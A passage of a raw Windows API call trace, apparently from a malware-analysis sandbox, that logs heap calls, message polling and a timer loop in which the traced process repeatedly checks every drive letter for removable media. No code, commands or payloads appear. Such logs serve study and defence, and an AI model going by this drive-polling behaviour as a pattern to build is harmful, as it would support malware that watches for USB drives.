dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0218.933] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.933] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.934] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.934] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.934] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.934] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.934] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.934] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0218.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.935] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.935] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.935] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.935] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.935] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.936] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.936] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.936] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.936] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.936] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.937] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.937] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.937] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.937] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.937] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.937] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.938] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.938] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.938] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.938] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.938] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.938] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.938] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.939] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.939] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.939] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.939] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.939] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0218.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.940] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0218.940] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0218.940] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.940] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.941] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.941] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.941] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0218.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0218.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0218.941] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.941] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.941] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.941] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.942] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.942] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.942] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.942] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.942] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.943] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.943] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.943] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.943] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.943] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.943] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.943] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.944] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.944] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.944] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.944] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.944] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.945] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.945] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.945] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.945] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.945] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.946] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0218.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0218.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0218.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.946] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.946] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.946] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.947] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.947] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0218.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0218.947] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0218.947] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.947] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.948] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.948] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.948] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.948] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.948] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.948] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.949] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0218.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.949] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.949] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.949] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.949] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.949] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.949] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.950] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.950] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.950] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.950] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.950] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.950] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.951] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.951] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.951] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.951] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.951] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.951] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.952] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.952] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.952] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.954] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.954] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.954] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.954] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.954] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.954] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.955] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0218.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.956] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.956] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.956] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.956] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.956] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.956] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0218.956] RtlAllocateHeap 